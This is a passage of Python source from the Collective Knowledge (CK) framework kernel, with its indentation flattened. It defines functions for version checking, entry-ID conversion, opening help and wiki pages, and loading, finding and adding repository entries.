out('If you use GitHub version, update CK kernel (and all other repositories) as follows:')
out(' $ ck pull all --kernel')
out('')
out('Visit '+u+' for more details!')
if o=='con':
if outdated!='yes':
out('Your version is up-to-date: V'+version_str)
elif outdated=='':
out('Problem checking version ...')
return {'return':0, 'outdated':outdated}
############################################################
# Compare versions
#
# TARGET: CK kernel and low-level developers
def check_version(i):
"""
Input: {
version - your version (string)
}
Output: {
return - return code = 0
ok - if 'yes', your CK kernel version is outdated
current_version - your CK kernel version
}
"""
ok='yes'
r=get_version({})
if r['return']>0: return r
version=r['version']
version_str=r['version_str']
lversion_str=i['version'].replace('dev','.1') # for compatibility with older versions
lversion=lversion_str.split('.')
# Comparing
for q in range(0, len(version)):
if len(lversion)<=q:
break
v=version[q]
lv=lversion[q]
# try int first, then try string
try:
lv=int(lv)
v=int(v)
except Exception as e:
pass
if lv>v:
ok='no'
break
if lv<v:
break
return {'return':0, 'ok':ok, 'current_version':version_str}
############################################################
# Convert info about entry to CID
#
# TARGET: CK kernel and low-level developers
def convert_entry_to_cid(i):
"""
Input: {
(repo_uoa) - Repo UOA
(repo_uid) - Repo UID
(module_uoa) - Module UOA
(module_uid) - Module UID
(data_uoa) - Data UOA
(data_uid) - Data UID
}
Output: {
return - return code = 0
cuoa - module_uoa:data_uoa (substituted with ? if can't find)
cid - module_uid:data_uid (substituted with ? if can't find)
xcuoa - repo_uoa:module_uoa:data_uoa (substituted with ? if can't find)
xcid - repo_uid:module_uid:data_uid (substituted with ? if can't find)
}
"""
xcuoa=''
xcid=''
if i.get('module_uoa','')!='': cuoa=i['module_uoa']
else: cuoa='?'
if i.get('module_uid','')!='': cid=i['module_uid']
else: cid='?'
cuoa+=':'
cid+=':'
if i.get('data_uoa','')!='': cuoa+=i['data_uoa']
else: cuoa+='?'
if i.get('data_uid','')!='': cid+=i['data_uid']
else: cid+='?'
if i.get('repo_uoa','')!='': xcuoa=i['repo_uoa']+':'+cuoa
else: xcuoa='?:'+cuoa
if i.get('repo_uid','')!='': xcid=i['repo_uid']+':'+cid
else: xcid='?:'+cid
r={'return':0}
r['cuoa']=cuoa
r['cid']=cid
r['xcuoa']=xcuoa
r['xcid']=xcid
return r
# **************************************************************************
# Common actions (if not found in other modules, call these functions here)
# **************************************************************************
############################################################
# Special function: open webbrowser with help
#
# TARGET: CK kernel and low-level developers
def webhelp(i):
"""
Input: { from access function }
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
a=i.get('repo_uoa','')
m=i.get('module_uoa','')
duoa=i.get('data_uoa','')
url=cfg['wiki_data_web']
if m!='':
if duoa=='':
duoa=m
m=cfg['module_name']
r=find_path_to_data({'repo_uoa':a, 'module_uoa':m, 'data_uoa':duoa})
if r['return']>0: return r
p=r['path']
muoa=r.get('module_uoa','')
duoa=r.get('data_uoa','')
rx=convert_entry_to_cid(r)
if rx['return']>0: return rx
cuoa=rx['cuoa']
cid=rx['cid']
xcuoa=rx['xcuoa']
xcid=rx['xcid']
# Prepare URL
url+=muoa+':'+duoa #cid.replace(':','/')
out('Opening web page '+url+' ...')
import webbrowser
webbrowser.open(url)
return {'return':0}
############################################################
# Special function: open webbrowser with discussion wiki page for collaborative R&D
# URL is taken from default kernel configuration cfg['wiki_data_web']
#
# TARGET: CK kernel and low-level developers
def wiki(i):
"""
Input: {
(repo_uoa)
(module_uoa)
(data_uoa)
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
url=cfg['wiki_data_web']
if muoa=='' or duoa=='':
# Try to detect CID in current path
rx=detect_cid_in_current_path({})
if rx['return']==0:
muoa=rx.get('module_uoa','')
duoa=rx.get('data_uoa','')
if muoa=='' or duoa=='':
return guide({}) #{'return':1, 'error':'entry is not defined'}
r=find_path_to_data({'repo_uoa':ruoa, 'module_uoa':muoa, 'data_uoa':duoa})
if r['return']>0: return r
rx=convert_entry_to_cid(r)
if rx['return']>0: return rx
cuoa=rx['cuoa']
cid=rx['cid']
xcuoa=rx['xcuoa']
xcid=rx['xcid']
# Prepare URL
url+=cid.replace(':','_')
out('Opening web page '+url+' ...')
import webbrowser
webbrowser.open(url)
return {'return':0}
############################################################
# Special function: open webbrowser with private discussion wiki page for collaborative R&D
# URL is taken from default kernel configuration cfg['private_wiki_data_web']
#
# TARGET: CK kernel and low-level developers
def pwiki(i):
"""
Input: {
(repo_uoa)
(module_uoa)
(data_uoa)
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
url=cfg['private_wiki_data_web']
if muoa=='' or duoa=='':
# Try to detect CID in current path
rx=detect_cid_in_current_path({})
if rx['return']==0:
muoa=rx.get('module_uoa','')
duoa=rx.get('data_uoa','')
if muoa=='' or duoa=='':
return {'return':1, 'error':'entry is not defined'}
r=find_path_to_data({'repo_uoa':ruoa, 'module_uoa':muoa, 'data_uoa':duoa})
if r['return']>0: return r
rx=convert_entry_to_cid(r)
if rx['return']>0: return rx
cuoa=rx['cuoa']
cid=rx['cid']
xcuoa=rx['xcuoa']
xcid=rx['xcid']
# Prepare URL
url+=cid.replace(':','_')
out('Opening web page '+url+' ...')
import webbrowser
webbrowser.open(url)
return {'return':0}
############################################################
# Special function: open webbrowser with API, if exists
#
# TARGET: CK kernel and low-level developers
def webapi(i):
"""
Input: { from access function }
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
url=cfg['api_web']
if muoa=='':
muoa=duoa
if muoa=='':
url+='ck_'+cfg['subdir_kernel']+'_api/html/kernel_8py.html'
else:
duoa=muoa
muoa=cfg['module_name']
r=load({'repo_uoa':ruoa, 'module_uoa':muoa, 'data_uoa':duoa})
if r['return']>0: return r
muoa=r['data_uoa']
url+=muoa+'/#api'
out('Opening web page '+url+' ...')
import webbrowser
webbrowser.open(url)
return {'return':0}
############################################################
# Special function: open webbrowser with API, if exists
#
# TARGET: CK kernel and low-level developers
def browser(i):
"""
Input: {
(template) - use this web template
(repo_uoa) -
(module_uoa) -
(data_uoa) - view a given entry
(extra_url) - extra URL
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
# Check if ck-web is installed
r=find({'module_uoa':'module',
'data_uoa':'wfe'})
if r['return']>0:
if r['return']!=16: return r
out('Seems like ck-web repository is not installed (can\'t find wfe module)!')
out('Please, install it via "ck pull repo:ck-web" and try again!')
return {'return':0}
t=i.get('template','')
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
cid=''
if duoa!='' or muoa!='' or ruoa!='':
if ruoa!='': cid=ruoa+':'
if muoa!='': cid+=muoa+':'
if duoa!='': cid+=duoa
# Starting web service and asking to open page
return access({'action':'start', 'module_uoa':'web', 'browser':'yes',
'template':t, 'cid':cid, 'extra_url':i.get('extra_url','')})
############################################################
# Special function: open webbrowser with user/developer guide wiki
#
# TARGET: CK kernel and low-level developers
def guide(i):
"""
Input: {}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
url=cfg['ck_web_wiki']
out('Opening web page '+url+' ...')
import webbrowser
webbrowser.open(url)
return {'return':0}
#########################################################
# Common action: print help for a given module
#
# TARGET: CK kernel and low-level developers
def help(i):
"""
Input: {
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
help - help text
}
"""
o=i.get('out','')
m=i.get('module_uoa','')
if m=='':
m='<module_uoa>'
h= 'Usage: '+cfg['cmd'].replace('$#module_uoa#$', m)+'\n'
if m=='<module_uoa>':
h+='\n'
h+=' Common actions for all CK modules (unless overloaded):\n'
for q in sorted(cfg['common_actions']):
s=q
desc=cfg['actions'][q].get('desc','')
if desc!='': s+=' - '+desc
h+=' * '+s+'\n'
h+='\n'
h+=' CK kernel actions:\n'
for q in sorted(cfg['actions']):
if q not in cfg['common_actions']:
s=q
desc=cfg['actions'][q].get('desc','')
if desc!='': s+=' - '+desc
h+=' * '+s+'\n'
else:
h+='\n'
h+=' Available actions:\n\n'
# Attempt to load
r=list_actions({'module_uoa':m})
if r['return']>0: return r
actions=r['actions']
if len(actions)==0:
h+=' Not described yet ...\n'
else:
for q in sorted(actions.keys()):
s=q
desc=actions[q].get('desc','')
if desc!='': s+=' - '+desc
h+=' * '+s+'\n'
h+='\n'
h+=' Common actions for this module from the CK kernel:\n'
h+=' $ ck help\n'
if m=='<module_uoa>':
h+='\n'
h+=cfg['help_examples']
h+='\n'
h+=cfg['help_web']
if o=='con': out(h)
return {'return':0, 'help':h}
#########################################################
# Common action: print help for a given module
#
# TARGET: CK kernel and low-level developers
def short_help(i):
"""
Input: {
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
help - help text
}
"""
import sys
o=i.get('out','')
r=version({})
if r['return']>0: return r
h='CK version: '+r['version_str']+'\n'
r=python_version({})
if r['return']>0: return r
x=sys.executable
if x!=None and x!='':
h+='\nPython executable used by CK: '+x+'\n'
h+='\nPython version used by CK: '+r['version'].replace('\n','\n ')+'\n'
h+='\nPath to the default repo: '+work['dir_default_repo']+'\n'
h+= 'Path to the local repo: '+work['dir_local_repo']+'\n'
h+= 'Path to CK repositories: '+work['dir_repos']+'\n'
h+='\n'+cfg['help_web'].replace('\n','').strip()+'\n' #.replace(' ','')+'\n'
h+='CK Google group: https://bit.ly/ck-google-group\n'
h+='CK Slack channel: https://cKnowledge.org/join-slack\n'
h+='Stable CK components: https://cKnowledge.io'
if o=='con':
out(h)
return {'return':0, 'help':h}
#########################################################
# Common action: print input
#
# TARGET: CK kernel and low-level developers
def print_input(i):
"""
Input: {
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
html - input as JSON
}
"""
o=i.get('out','')
rx=dumps_json({'dict':i, 'sort_keys':'yes'})
if rx['return']>0: return rx
h=rx['string']
if o=='con': out(h)
return {'return':0, 'html':h}
#########################################################
# Common action: print info about a given CK entry
#
# TARGET: CK kernel and low-level developers
def info(i):
"""
Input: {
(repo_uoa)
module_uoa
(data_uoa)
}
Output: {
Output of 'load' function
}
"""
o=i.get('out','')
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
if muoa=='':
return {'return':1, 'error':'module UOA is not defined'}
module_info=False
if duoa=='':
module_info=True
duoa=muoa
muoa=cfg['module_name']
ii={'module_uoa':muoa, 'data_uoa':duoa}
if ruoa!='': ii['repo_uoa']=ruoa
r=load(ii)
if r['return']>0: return r
if o=='con':
if module_info:
p=r['path']
dd=r['dict']
developer=dd.get('developer','')
license=dd.get('license','')
desc=dd.get('desc','')
# Get user-friendly CID
rx=convert_entry_to_cid(r)
if rx['return']>0: return rx
cuoa=rx['cuoa']
cid=rx['cid']
xcuoa=rx['xcuoa']
xcid=rx['xcid']
out('*** CID ***')
out(cuoa+' ('+cid+')')
out('')
out('*** Path ***')
out(p)
if desc!='':
out('')
out('*** Description ***')
out(desc)
if developer!='':
out('')
out('*** Developer ***')
out(developer)
if license!='':
out('')
out('*** License ***')
out(license)
else:
p=r['path']
duid=r['data_uid']
dalias=r['data_alias']
muid=r['module_uid']
malias=r['module_alias']
out('Path = '+p)
out('')
out('Data alias = '+dalias)
out('Data UID = '+duid)
out('')
out('Module alias = '+malias)
out('Module UID = '+muid)
return r
############################################################
# Common action: get CID from current path
#
# TARGET: CK kernel and low-level developers
def path(i):
"""
Input: {}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
Output from from 'detect_cid_in_current_path' function
}
"""
o=i.get('out','')
r=detect_cid_in_current_path(i)
if r['return']>0: return r
rx=convert_entry_to_cid(r)
if rx['return']>0: return rx
cuoa=rx['cuoa']
cid=rx['cid']
xcuoa=rx['xcuoa']
xcid=rx['xcid']
# If console, print CIDs
if o=='con':
out(cuoa)
out(cid)
out(xcuoa)
out(xcid)
return r
############################################################
# Common action: get CID from current path or given CID (module_uid:data_uid)
#
# TARGET: end users
def cid(i):
"""
Input: {
(repo_uoa) - repo UOA
(module_uoa) - module UOA
(data_uoa) - data UOA
If above is empty, detect in current path !
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
Output from from 'detect_cid_in_current_path' function
data_uoa - data UOA
module_uoa - module UOA
(repo_uoa) - repo UOA
}
"""
o=i.get('out','')
# Check which CID to detect
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
if ruoa=='' and muoa=='' and duoa=='':
r=detect_cid_in_current_path(i)
else:
r=find({'repo_uoa':ruoa, 'module_uoa':muoa, 'data_uoa':duoa})
if r['return']>0: return r
rx=convert_entry_to_cid(r)
if rx['return']>0: return rx
cid=rx['cid']
# If console, print CIDs
if o=='con':
out(cid)
# Try to copy to Clipboard if supported by OS
rx=copy_to_clipboard({'string':cid})
# Ignore error
return r
############################################################
# Copy current path to clipboard (productivity function)
#
# TARGET: CK kernel and low-level developers
def copy_path_to_clipboard(i):
"""
Input: {
(add_quotes) - if 'yes', add quotes
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
import os
p=os.getcwd()
if i.get('add_quotes','')=='yes':
p='"'+p+'"'
rx=copy_to_clipboard({'string':p})
# Ignore error
return {'return':0}
#########################################################
# Common action: load data (module) meta description
#
# TARGET: CK kernel and low-level developers
def load(i):
"""
Input: {
(repo_uoa) - repo UOA
module_uoa - module UOA
data_uoa - data UOA
(get_lock) - if 'yes', lock this entry
(lock_retries) - number of retries to aquire lock (default=5)
(lock_retry_delay) - delay in seconds before trying to aquire lock again (default=10)
(lock_expire_time) - number of seconds before lock expires (default=30)
(skip_updates) - if 'yes', do not load updates
(skip_desc) - if 'yes', do not load descriptions
(load_extra_json_files) - list of files to load from the entry
(unlock_uid) - UID of the lock to release it
(min) - show minimum when output to console (i.e. meta and desc)
(create_if_not_found) - if 'yes', create, if entry is not found - useful to create and lock entries
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
dict - entry meta description
(info) - entry info
(updates) - entry updates
(desc) - entry description
path - path to data entry
path_module - path to module entry with this entry
path_repo - path to the repository of this entry
repo_uoa - repo UOA
repo_uid - repo UID
repo_alias - repo alias
module_uoa - module UOA
module_uid - module UID
module_alias - module alias
data_uoa - data UOA
data_uid - data UID
data_alias - data alias
data_name - user friendly name
(extra_json_files) - dict with extra json files (key is the filename from 'load_extra_json_files')
(lock_uid) - unlock UID, if locked successfully
}
"""
o=i.get('out','')
a=i.get('repo_uoa','')
m=i.get('module_uoa','')
d=i.get('data_uoa','')
if d=='':
return {'return':1, 'error':'data UOA is not defined'}
r=find_path_to_data({'repo_uoa':a, 'module_uoa':m, 'data_uoa':d})
if r['return']>0:
if r['return']==16 and i.get('create_if_not_found','')=='yes':
r=add({'repo_uoa':a, 'module_uoa':m, 'data_uoa':d})
if r['return']>0:
return r
r=find_path_to_data({'repo_uoa':a, 'module_uoa':m, 'data_uoa':d})
if r['return']>0: return r
else:
return r
p=r['path']
slu=i.get('skip_updates','')
sld=i.get('skip_desc','')
# Set/check lock
i['path']=p
rx=set_lock(i)
if rx['return']>0: return rx
luid=rx.get('lock_uid','')
# Load meta description
r1=load_meta_from_path({'path':p, 'skip_updates':slu, 'skip_desc':sld})
if r1['return']>0: return r1
r.update(r1)
r['path']=p
r['data_name']=r1.get('info',{}).get('data_name','')
if luid!='': r['lock_uid']=luid
# If load extra files
lejf=i.get('load_extra_json_files',[])
if len(lejf)>0:
ejf={}
for ff in lejf:
rx=load_json_file({'json_file':os.path.join(p,ff)})
if rx['return']>0: return rx
ejf[ff]=rx['dict']
r['extra_json_files']=ejf
# If console mode, print json
if o=='con':
dd=r
if i.get('min','')=='yes':
dd={
'desc':r.get('desc',{}),
'dict':r.get('dict',{})
}
rr=dumps_json({'dict':dd, 'sort_keys':'yes'})
if rr['return']==0:
out(rr['string'])
return r
#########################################################
# Common action: find data (module) - uses 'load' function
#
# TARGET: CK kernel and low-level developers
def find(i):
"""
Input: {
(repo_uoa) - repo UOA
module_uoa - module UOA
data_uoa - data UOA
}
Output: {
Output of the 'load' function
number_of_entries - total number of found entries
}
"""
o=i.get('out','')
rr=find2(i)
if rr['return']>0:
if rr['return']==16 and cfg.get('download_missing_components','')=='yes':
import copy
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
# out('')
# out(' WARNING: checking missing components "'+muoa+':'+duoa+'" at the CK portal ...')
ii=copy.deepcopy(i)
ii['repo_uoa']=cfg['default_exchange_repo_uoa']
ii['out']='con'
# Try to download
ry=download(ii)
if ry['return']>0: return ry
# Restart local find
rr=find2(i)
return rr
#########################################################
# original find
def find2(i):
o=i.get('out','')
i['out']=''
# Check wildcards
lst=[]
a=i.get('repo_uoa','')
m=i.get('module_uoa','')
duoa=i.get('data_uoa','')
if m=='':
return {'return':1, 'error':'module UOA is not defined'}
if duoa=='':
return {'return':1, 'error':'data UOA is not defined'}
if a.find('*')>=0 or a.find('?')>=0 or m.find('*')>=0 or m.find('?')>=0 or duoa.find('*')>=0 or duoa.find('?')>=0:
r=list_data({'repo_uoa':a, 'module_uoa':m, 'data_uoa':duoa})
if r['return']>0: return r
lst=r['lst']
r={'return':0}
if len(lst)>0:
r.update(lst[0])
else:
return {'return':1, 'error':'entry was not found'}
else:
# Find path to data
r=find_path_to_data(i)
if r['return']>0: return r
p=r['path']
ruoa=r.get('repo_uoa','')
ruid=r.get('repo_uid','')
muoa=r.get('module_uoa','')
muid=r.get('module_uid','')
duid=r.get('data_uid','')
duoa=r.get('data_alias','')
if duoa=='': duoa=duid
lst.append({'path':p, 'repo_uoa':ruoa, 'repo_uid':ruid,
'module_uoa':muoa, 'module_uid':muid,
'data_uoa':duoa, 'data_uid': duid})
if o=='con':
pf=''
for q in lst:
p=q['path']
out(p)
if pf=='': pf=p
i['out']=o
r['number_of_entries']=len(lst)
return r
#########################################################
# Common action: print 'cd {path to CID}'
#
# TARGET: CK kernel and low-level developers
def cd(i):
"""
Input: {
(repo_uoa) - repo UOA
module_uoa - module UOA
data_uoa - data UOA
or
cid
}
Output: {
Output of the 'load' function
string - prepared string 'cd {path to entry}'
}
"""
o=i.get('out','')
i['out']=''
r=find(i)
i['out']=o
if r['return']>0: return r
noe=r.get('number_of_entries','')
if noe=='': noe=0
if noe>1 and o=='con':
out('CK warning: '+str(noe)+' entries found! Selecting the first one ...')
out('')
p=r.get('path','')
if p!='':
rx=get_os_ck({})
if rx['return']>0: return rx
plat=rx['platform']
s='cd '
if plat=='win':
s+='/D '
if p.find(' ')>0:
p='"'+p+'"'
s+=p
out(s)
r['string']=s
import platform
import subprocess
out('')
out('Warning: you are in a new shell with a reused environment. Enter "exit" to return to the original one!')
if platform.system().lower().startswith('win'): # pragma: no cover
p = subprocess.Popen(["cmd", "/k", s], shell = True, env=os.environ)
p.wait()
else:
rx=gen_tmp_file({})
if rx['return']>0: return rx
fn=rx['file_name']
rx=save_text_file({'text_file':fn, 'string':s})
if rx['return']>0: return rx
os.system("bash --rcfile "+fn)
return r
#########################################################
# Common action: print 'cd {path to CID} and copy to clipboard'
#
# TARGET: CK kernel and low-level developers
def cdc(i): # pragma: no cover
"""
Input: {
(repo_uoa) - repo UOA
module_uoa - module UOA
data_uoa - data UOA
or
cid
}
Output: {
Output of the 'load' function
}
"""
r=cd(i)
if r['return']>0: return r
s=r.get('string','')
if s!='':
rx=copy_to_clipboard({'string':s})
if rx['return']>0: return rx
return r
##############################################################################
# Common action: add data (module) meta-description to a repository
#
# TARGET: CK kernel and low-level developers
def add(i):
"""
Input: {
(repo_uoa) - repo UOA
module_uoa - module UOA
data_uoa - data UOA
(data_uid) - data UID (if uoa is an alias)
(data_name) - user friendly data name
(dict_from_cid) -
(dict_from_repo_uoa) -
(dict_from_module_uoa) -
(dict_from_data_uoa) - if present, pre-load dict
from this (module_uoa):data_uoa (analog of copy)
(update) - if == 'yes' and entry exists, update it
(dict) - meta description to record
(substitute) - if 'yes' and update=='yes' substitute dictionaries, otherwise merge!
(desc) - description of an entry (gradually adding API description in flat format)
(extra_json_files) - dict with extra json files to save to entry (key is a filename)
(tags) - list or comma separated list of tags to add to entry
(info) - entry info to record - normally, should not use it!
(extra_info) - enforce extra info such as
author
author_email
author_webpage
license
copyright
If not specified then taken from kernel (prefix 'default_')
(updates) - entry updates info to record - normally, should not use it!
(ignore_update) - if 'yes', do not add info about update
(ask) - if 'yes', ask questions, otherwise silent
(unlock_uid) - unlock UID if was previously locked
(sort_keys) - by default, 'yes'
(share) - if 'yes', try to add via GIT
(skip_indexing) - if 'yes', skip indexing even if it is globally on
(allow_multiple_aliases) - if 'yes', allow multiple aliases for the same UID
(needed for cKnowledge.io to publish
renamed components with the same UID)
}
Output: {
return - return code = 0, if successful
16, if entry already exists
> 0, if error
(error) - error text if return > 0
Output from the 'create_entry' function
}
"""
o=i.get('out','')
t='added'
ra=i.get('repo_uoa','')
m=i.get('module_uoa','')
d=i.get('data_uoa','')
di=i.get('data_uid','')
dn=i.get('data_name','')
ama=(i.get('allow_multiple_aliases','')=='yes') # Experimental functionality for cKnowledge.io
if cfg.get('allowed_entry_names','')!='':
import re
anames=cfg.get('allowed_entry_names','')
if not re.match(anames, ra) or \
not re.match(anames, m) or \
not re.match(anames, d) or \
not re.match(anames, di):
return {'return':1, 'error':'found disallowed characters in names (allowed: "'+anames+'")'}
if cfg.get('force_lower','')=='yes':
ra=ra.lower()
m=m.lower()
d=d.lower()
di=di.lower()
uuid=i.get('unlock_uid','')
up=i.get('update','')
ask=i.get('ask','')
# Get repo path
r=find_path_to_repo({'repo_uoa':ra})
if r['return']>0: return r
pr=r['path']
ruoa=r['repo_uoa']
ruid=r['repo_uid']
ralias=r['repo_alias']
rd=r['dict']
rshared=rd.get('shared','')
rsync=rd.get('sync','')
if i.get('share','')=='yes': rsync='yes'
# Check if writing is allowed
ii={'module_uoa':m, 'repo_uoa':r['repo_uoa'], 'repo_uid':r['repo_uid'], 'repo_dict':rd}
r=check_writing(ii)
if r['return']>0: return r
# Load info about module
r=load({'module_uoa':cfg['module_name'],
'data_uoa':m})
if r['return']>0: return r
elif r['return']==16:
return {'return':8, 'error':'can\'t find path to module "'+m+'"'}
muoa=r['data_uoa']
muid=r['data_uid']
malias=r['data_alias']
pm=r['path']
uid=r['data_uid']
alias=r['data_alias']
if alias=='': alias=uid
module_desc=r['dict']
# Check if there is a split of directories for this module in local config
# to handle numerous entries (similar to MediaWiki)
split_dirs=get_split_dir_number(rd, muid, muoa)
# Ask additional questions
if o=='con' and ask=='yes':
# Asking for alias
if d=='' or is_uid(d):
r=inp({'text':'Enter an alias (or Enter to skip it): '})
d=r['string']
# Asking for user-friendly name
if dn=='' and up!='yes':
r=inp({'text':'Enter a user-friendly name of this entry (or Enter to reuse alias): '})
dn=r['string']
# Load dictionary from other entry if needed
dfcid=i.get('dict_from_cid','')
dfruoa=i.get('dict_from_repo_uoa','')
dfmuoa=i.get('dict_from_module_uoa','')
dfduoa=i.get('dict_from_data_uoa','')
if dfcid!='':
r=parse_cid({'cid':dfcid})
if r['return']>0: return r
dfruoa=r.get('repo_uoa','')
dfmuoa=r.get('module_uoa','')
dfduoa=r.get('data_uoa','')
if d!='' and not is_uoa(d):
return {'return':1, 'error':'alias has disallowed characters'}
if dfduoa!='':
if dfmuoa=='': dfmuoa=m
ii={'module_uoa':dfmuoa, 'data_uoa':dfduoa}
if dfruoa!='': ii['repo_uoa']=dfruoa
r=load(ii)
if r['return']>0: return r
df=r.get('dict',{})
# Create first level entry (module)
r=create_entry({'path':pr, 'data_uoa':alias, 'data_uid':uid})
if r['return']>0 and r['return']!=16: return r
p1=r['path']
# Create second level entry (data)
i1={'path':p1}
if split_dirs!=0:
i1['split_dirs']=split_dirs
pdd=''
if di!='':
i1['data_uid']=di
if d!='':
i1['data_uoa']=d
if ama:
i1['allow_multiple_aliases']='yes'
rr=create_entry(i1)
if rr['return']>0 and rr['return']!=16: return rr
duid=rr['data_uid']
pdd=rr['data_uoa']
dalias=rr['data_alias']
# Preparing meta-description
a={}
info={}
updates={}
desc={}
p2=rr['path']
p3=os.path.join(p2, cfg['subdir_ck_ext'])
p4=os.path.join(p3, cfg['file_meta'])
p4i=os.path.join(p3, cfg['file_info'])
p4u=os.path.join(p3, cfg['file_updates'])
p4d=os.path.join(p3, cfg['file_desc'])
# If last entry exists
if rr['return']==16:
if up=='yes':
t='updated'
# Check if locked
rl=check_lock({'path':p2, 'unlock_uid':uuid})
if rl['return']>0:
if rl['return']==32:
rl['data_uoa']=pdd
rl['data_uid']=duid
return rl
# Entry exists, load configuration if update
r2=load_meta_from_path({'path':p2})
if r2['return']>0: return r2
a=r2['dict']
info=r2.get('info',{})
updates=r2.get('updates',{})
desc=r2.get('desc',{})
if dn=='': dn=info.get('data_name','')
else:
return {'return':16,'error':'entry already exists in path ('+p2+')'}
else:
# Create configuration directory
if not os.path.isdir(p3):
try:
os.mkdir(p3)
except Exception as e:
return {'return':1, 'error':format(e)}
if dn=='' and not is_uid(d):
dn=d
if dfduoa!='':
r=merge_dicts({'dict1':a, 'dict2':df})
if r['return']>0: return r
# If dict, info and updates are in input, try to merge ...
cma=i.get('dict',{})
cmad=i.get('desc',{})
if i.get('substitute','')=='yes':
a=cma
desc=cmad
else:
r=merge_dicts({'dict1':a, 'dict2':cma})
if r['return']>0: return r
r=merge_dicts({'dict1':desc, 'dict2':cmad})
if r['return']>0: return r
# Check tags
xtags=a.get('tags',[])
tags=i.get('tags','')
if tags=='': tags=[]
elif type(tags)!=list:
tags=tags.split(',')
for l in range(0,len(tags)):
ll=tags[l].strip()
if ll not in xtags:
xtags.append(ll)
if len(xtags)>0:
a['tags']=xtags
# Process info
cminfo=i.get('info',{})
if len(cminfo)!=0:
info=cminfo
# r=merge_dicts({'dict1':info, 'dict2':cminfo})
# if r['return']>0: return r
cmupdates=i.get('updates',{})
if len(cmupdates)!=0:
updates=cmupdates
# r=merge_dicts({'dict1':updates, 'dict2':cmupdates})
# if r['return']>0: return r
# If name exists, add
info['backup_module_uoa']=muoa
info['backup_module_uid']=muid
info['backup_data_uid']=duid
if dn!='': info['data_name']=dn
# Add control info
ri=prepare_special_info_about_entry({})
if ri['return']>0: return ri
x=ri['dict']
# Check if pre-set control params such as author, copyright, license
ei=i.get('extra_info',{})
if len(ei)!=0: x.update(ei)
y=info.get('control',{})
if i.get('ignore_update','')!='yes':
if len(y)==0:
info['control']=x
else:
y=updates.get('control',[])
y.append(x)
updates['control']=y
sk=i.get('sort_keys','')
if sk=='': sk='yes'
if len(updates)>0:
# Record updates
rx=save_json_to_file({'json_file':p4u, 'dict':updates, 'sort_keys':sk})
if rx['return']>0: return rx
# Record meta description
rx=save_json_to_file({'json_file':p4, 'dict':a, 'sort_keys':sk})
if rx['return']>0: return rx
# Record info
rx=save_json_to_file({'json_file':p4i, 'dict':info, 'sort_keys':sk})
if rx['return']>0: return rx
# Record desc
rx=save_json_to_file({'json_file':p4d, 'dict':desc, 'sort_keys':sk})
if rx['return']>0: return rx
# Record extra files if there
ejf=i.get('extra_json_files',{})
if len(ejf)>0:
for ff in ejf:
dff=ejf[ff]
rz=save_json_to_file({'json_file':os.path.join(p2,ff), 'dict':dff, 'sort_keys':sk})
if rz['return']>0: return rz
if o=='con':
out('Entry '+d+' ('+duid+', '+p2+') '+t+' successfully!')
# Check if needs to be synced
if rshared!='' and rsync=='yes':
ppp=os.getcwd()
os.chdir(pr)
if os.path.isdir(cfg['subdir_ck_ext']):
ss=cfg['repo_types'][rshared]['add'].replace('$#path#$', pr).replace('$#files#$', cfg['subdir_ck_ext'])
rx=os.system(ss)
os.chdir(p1)
if os.path.isdir(cfg['subdir_ck_ext']):
ss=cfg['repo_types'][rshared]['add'].replace('$#path#$', pr).replace('$#files#$', cfg['subdir_ck_ext'])
rx=os.system(ss)
ss=cfg['repo_types'][rshared]['add'].replace('$#path#$', pr).replace('$#files#$', pdd)
rx=os.system(ss)
os.chdir(ppp)
# Prepare output
rr={'return':0,
'dict': a,
'info': info,
'updates': updates,
'path':p2,
'path_module': pm,
'path_repo': pr,
'repo_uoa':ruoa,
'repo_uid':ruid,
'repo_alias':ralias,
'module_uoa':muoa,
'module_uid':muid,
'module_alias':malias,
'data_uoa':pdd,
'data_uid':duid,
'data_alias':dalias,
'data_name':dn}
# Check if need to add index
if i.get('skip_indexing','')!='yes' and cfg.get('use_indexing','')=='yes':
muid=rr['module_uid']
if index_module(muid,ruid):
duid=rr['data_uid']
path='/'+muid+'/'+duid+'/1'
ri=access_index_server({'request':'DELETE', 'path':path})
if ri['return']>0: return ri
ri=access_index_server({'request':'PUT', 'path':path, 'dict':rr})
if ri['return']>0: return ri
# Remove lock after update if needed
if uuid!='':
pl=os.path.join(p2, cfg['subdir_ck_ext'], cfg['file_for_lock'])
if os.path.isfile(pl): os.remove(pl)
rr['return']=0
return rr
##############################################################################
# Common action: update data (module) meta-description to a repository
#
# TARGET: CK kernel and low-level developers
def update(i):
"""
Input: {
(repo_uoa) - repo UOA
module_uoa - module UOA
data_uoa - data UOA
(data_uid) - data UID (if uoa is an alias)
(data_name) - user friendly data name
(dict_from_cid) -
(dict_from_repo_uoa) -
(dict_from_module_uoa) -
(dict_from_data_uoa) - if present, pre-load dict
from this (module_uoa):data_uoa (analog of copy)
(dict) - meta description to record
(substitute) - if 'yes', substitute dictionaries, otherwise merge!
(tags) - list or comma separated list of tags to add to entry
(info) - entry info to record - normally, should not use it!
